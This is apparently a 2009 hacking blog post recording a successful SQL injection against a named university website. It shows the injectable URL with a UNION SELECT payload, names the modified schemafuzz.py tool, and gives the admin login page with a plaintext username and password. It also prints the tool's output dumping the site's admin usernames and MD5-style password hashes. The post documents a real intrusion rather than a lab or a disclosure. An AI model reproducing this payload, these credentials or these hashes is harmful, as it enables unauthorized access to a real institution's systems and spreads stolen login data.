viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, January 16, 2009

[SQLi] http://www.ukb.ac.id

10:57 PM Posted by viperfx07 No comments

Tool = schemafuzz.py v5.0 mod by me
Admin page = http://www.ukb.ac.id/admin/
Admin usr:pwd = saropi:saropi

[+] URL: http://www.ukb.ac.id/detail_berita.php?id=15+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 22:52:20
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ukb_dbaseukb
User: ukb_dbaseukb@localhost
Version: 4.0.26-standard-log
[+] Dumping data from database "ukb_dbaseukb" Table "admin"
[+] and Column(s) ['username', 'password']
[+] Number of Rows: 2

[0] saropi:335c20f320d1f837a27e887c33044044:
[1] admin:fe8268e1262102afb740325a7c9706bb:
[2] No data

[-] 22:52:24
[-] Total URL Requests 4
[-] Done

0 comments:

Post a Comment